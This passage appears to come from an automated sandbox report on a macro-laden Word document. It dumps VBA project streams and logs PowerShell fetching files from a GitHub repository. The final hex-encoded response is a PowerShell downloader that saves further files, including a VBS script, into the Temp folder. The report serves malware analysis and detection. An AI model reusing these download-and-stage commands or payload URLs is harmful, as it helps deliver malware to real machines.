                                                                                                                                            Data ASCII:I D = " { 1 4 7 7 3 D 1 2 - 3 6 E D - 4 9 7 4 - A 2 7 E - 6 C 6 3 B 7 A 5 4 1 1 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 0 4 2 E 9 E F E D E F E D E F E D E F E D " . . D P B = " 9 C 9 E 3 5 1 B C D 7 6 C E 7 6 C E 7 6 " . . G C = " F 8 F A 5 1 A 2 5 2 A 2 5 2 5 D " . . . . [ H o s t E x
                                                                                                                                            Data Raw:49 44 3d 22 7b 31 34 37 37 33 44 31 32 2d 33 36 45 44 2d 34 39 37 34 2d 41 32 37 45 2d 36 43 36 33 42 37 41 35 34 31 31 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
                                                                                                                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/PROJECTwm
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:71
                                                                                                                                            Entropy:3.34859995248
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
                                                                                                                                            Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
                                                                                                                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2597
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:2597
                                                                                                                                            Entropy:4.06864016648
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                                                            Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                            Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 2013
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/VBA/__SRP_0
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:2013
                                                                                                                                            Entropy:3.60393793372
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ L . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00
                                                                                                                                            Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 186
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/VBA/__SRP_1
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:186
                                                                                                                                            Entropy:1.60078147632
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 11 00 00 00 00 00 00 00 00 00 05 00 06 00
                                                                                                                                            Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 348
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/VBA/__SRP_2
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:348
                                                                                                                                            Entropy:1.78667786328
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                                                            Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 106
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/VBA/__SRP_3
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:106
                                                                                                                                            Entropy:1.35911194617
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                                                                                                                                            Stream Path: Macros/VBA/__SRP_4, File Type: data, Stream Size: 347
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/VBA/__SRP_4
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:347
                                                                                                                                            Entropy:2.16838987833
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . g . . . . . g . 2 . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g . . . . . { . . . . . . . . . . . 8 . @ . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 01 00 01 00 02 00 00 00 21 0b 00 00 00 00 00 00 00 00 00 00 f1 08 00 00 00 00
                                                                                                                                            Stream Path: Macros/VBA/__SRP_5, File Type: data, Stream Size: 156
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/VBA/__SRP_5
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:156
                                                                                                                                            Entropy:1.58115335118
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 568
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/VBA/dir
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:568
                                                                                                                                            Entropy:6.29850563159
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. 4 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . z c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
                                                                                                                                            Data Raw:01 34 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 81 d1 7a 63 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                                                                                            Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                                                                                                            General
                                                                                                                                            Stream Path:WordDocument
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:4096
                                                                                                                                            Entropy:1.46842568754
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j z y z y . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 b . . 6 b G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:ec a5 c1 00 5f 00 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8e 08 00 00 0e 00 62 6a 62 6a 7a 79 7a 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 0e 00 00 18 13 36 62 18 13 36 62 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                                            Network Behavior

                                                                                                                                            Snort IDS Alerts

                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                            11/04/21-01:49:49.942100UDP254DNS SPOOF query response with TTL of 1 min. and no authority53521678.8.8.8192.168.2.22
                                                                                                                                            11/04/21-01:49:50.024088UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 4, 2021 01:49:49.958056927 CET4916580192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:49.975087881 CET8049165140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:49.975174904 CET4916580192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:49.978108883 CET4916580192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:49.995512962 CET8049165140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.025172949 CET49166443192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.025216103 CET44349166140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.025315046 CET49166443192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.049352884 CET49166443192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.049386978 CET44349166140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.099561930 CET44349166140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.100049973 CET49166443192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.109554052 CET49166443192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.109579086 CET44349166140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.110059023 CET44349166140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.203811884 CET4916580192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.313007116 CET49166443192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.415730000 CET49166443192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.456871033 CET44349166140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.550899029 CET44349166140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.551024914 CET44349166140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.551069021 CET49166443192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.551084042 CET44349166140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.551095963 CET44349166140.82.121.3192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.551146030 CET49166443192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.554740906 CET49166443192.168.2.22140.82.121.3
                                                                                                                                            Nov 4, 2021 01:49:50.577950001 CET49167443192.168.2.22185.199.108.133
                                                                                                                                            Nov 4, 2021 01:49:50.577989101 CET44349167185.199.108.133192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.578098059 CET49167443192.168.2.22185.199.108.133
                                                                                                                                            Nov 4, 2021 01:49:50.578778982 CET49167443192.168.2.22185.199.108.133
                                                                                                                                            Nov 4, 2021 01:49:50.578793049 CET44349167185.199.108.133192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.622517109 CET44349167185.199.108.133192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.622648001 CET49167443192.168.2.22185.199.108.133
                                                                                                                                            Nov 4, 2021 01:49:50.635114908 CET49167443192.168.2.22185.199.108.133
                                                                                                                                            Nov 4, 2021 01:49:50.635132074 CET44349167185.199.108.133192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.635641098 CET44349167185.199.108.133192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.651793957 CET49167443192.168.2.22185.199.108.133
                                                                                                                                            Nov 4, 2021 01:49:50.692886114 CET44349167185.199.108.133192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.812530041 CET44349167185.199.108.133192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.812637091 CET44349167185.199.108.133192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.812717915 CET49167443192.168.2.22185.199.108.133
                                                                                                                                            Nov 4, 2021 01:49:50.813937902 CET49167443192.168.2.22185.199.108.133
                                                                                                                                            Nov 4, 2021 01:49:52.633305073 CET4916580192.168.2.22140.82.121.3

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 4, 2021 01:49:49.920382023 CET5216753192.168.2.228.8.8.8
                                                                                                                                            Nov 4, 2021 01:49:49.942100048 CET53521678.8.8.8192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.002633095 CET5059153192.168.2.228.8.8.8
                                                                                                                                            Nov 4, 2021 01:49:50.024087906 CET53505918.8.8.8192.168.2.22
                                                                                                                                            Nov 4, 2021 01:49:50.558506966 CET5780553192.168.2.228.8.8.8
                                                                                                                                            Nov 4, 2021 01:49:50.577189922 CET53578058.8.8.8192.168.2.22

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                            Nov 4, 2021 01:49:49.920382023 CET192.168.2.228.8.8.80xcf68Standard query (0)github.comA (IP address)IN (0x0001)
                                                                                                                                            Nov 4, 2021 01:49:50.002633095 CET192.168.2.228.8.8.80xadabStandard query (0)github.comA (IP address)IN (0x0001)
                                                                                                                                            Nov 4, 2021 01:49:50.558506966 CET192.168.2.228.8.8.80xd1cdStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                            Nov 4, 2021 01:49:49.942100048 CET8.8.8.8192.168.2.220xcf68No error (0)github.com140.82.121.3A (IP address)IN (0x0001)
                                                                                                                                            Nov 4, 2021 01:49:50.024087906 CET8.8.8.8192.168.2.220xadabNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)
                                                                                                                                            Nov 4, 2021 01:49:50.577189922 CET8.8.8.8192.168.2.220xd1cdNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                                                                                            Nov 4, 2021 01:49:50.577189922 CET8.8.8.8192.168.2.220xd1cdNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                                                                                            Nov 4, 2021 01:49:50.577189922 CET8.8.8.8192.168.2.220xd1cdNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                                                                                            Nov 4, 2021 01:49:50.577189922 CET8.8.8.8192.168.2.220xd1cdNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • github.com
                                                                                                                                            • raw.githubusercontent.com

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.2249166140.82.121.3443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            1192.168.2.2249167185.199.108.133443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            2192.168.2.2249165140.82.121.380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Nov 4, 2021 01:49:49.978108883 CET0OUTGET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1
                                                                                                                                            Host: github.com
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 4, 2021 01:49:49.995512962 CET0INHTTP/1.1 301 Moved Permanently
                                                                                                                                            Content-Length: 0
                                                                                                                                            Location: https://github.com/ssbb36/stv/raw/main/5.mp3


                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.2249166140.82.121.3443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            2021-11-04 00:49:50 UTC0OUTGET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1
                                                                                                                                            Host: github.com
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2021-11-04 00:49:50 UTC0INHTTP/1.1 302 Found
                                                                                                                                            Server: GitHub.com
                                                                                                                                            Date: Thu, 04 Nov 2021 00:49:50 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                            permissions-policy: interest-cohort=()
                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com https://viewscreen.githubusercontent.com https://notebooks.githubusercontent.com
                                                                                                                                            Location: https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                            X-Frame-Options: deny
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                            2021-11-04 00:49:50 UTC0INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                                                            2021-11-04 00:49:50 UTC2INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 6d 61 69 6e 2f 35 2e 6d 70 33 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                            Data Ascii: <html><body>You are being <a href="https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3">redirected</a>.</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            1192.168.2.2249167185.199.108.133443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            2021-11-04 00:49:50 UTC2OUTGET /ssbb36/stv/main/5.mp3 HTTP/1.1
                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2021-11-04 00:49:50 UTC2INHTTP/1.1 200 OK
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 473
                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            ETag: "c42cd382e5da9f4f09cf49119db08f21ab927655a40c4bf6043e9fbeafdbfa36"
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Frame-Options: deny
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            X-GitHub-Request-Id: 575C:24AC:9E4121:A4F6C2:61832E2E
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Date: Thu, 04 Nov 2021 00:49:50 GMT
                                                                                                                                            Via: 1.1 varnish
                                                                                                                                            X-Served-By: cache-mxp6940-MXP
                                                                                                                                            X-Cache: MISS
                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                            X-Timer: S1635986991.659436,VS0,VE145
                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            X-Fastly-Request-ID: 90989139000a6800ba561921d915249b8b2851f4
                                                                                                                                            Expires: Thu, 04 Nov 2021 00:54:50 GMT
                                                                                                                                            Source-Age: 0
                                                                                                                                            2021-11-04 00:49:50 UTC3INData Raw: 63 64 20 24 45 6e 76 3a 54 65 6d 70 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 32 2e 6d 70 33 22 20 2d 4f 75 74 46 69 6c 65 20 22 74 65 6d 70 35 34 36 38 35 22 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 31 2e 6d 70 33 22 20 2d 4f 75 74 46 69 6c 65 20 22 65 6e 64 2e 76 62 73 22 0a 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 22 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 73 62 62 33 36 2f 73 74 76 2f 72 61 77 2f 6d 61 69 6e 2f 33
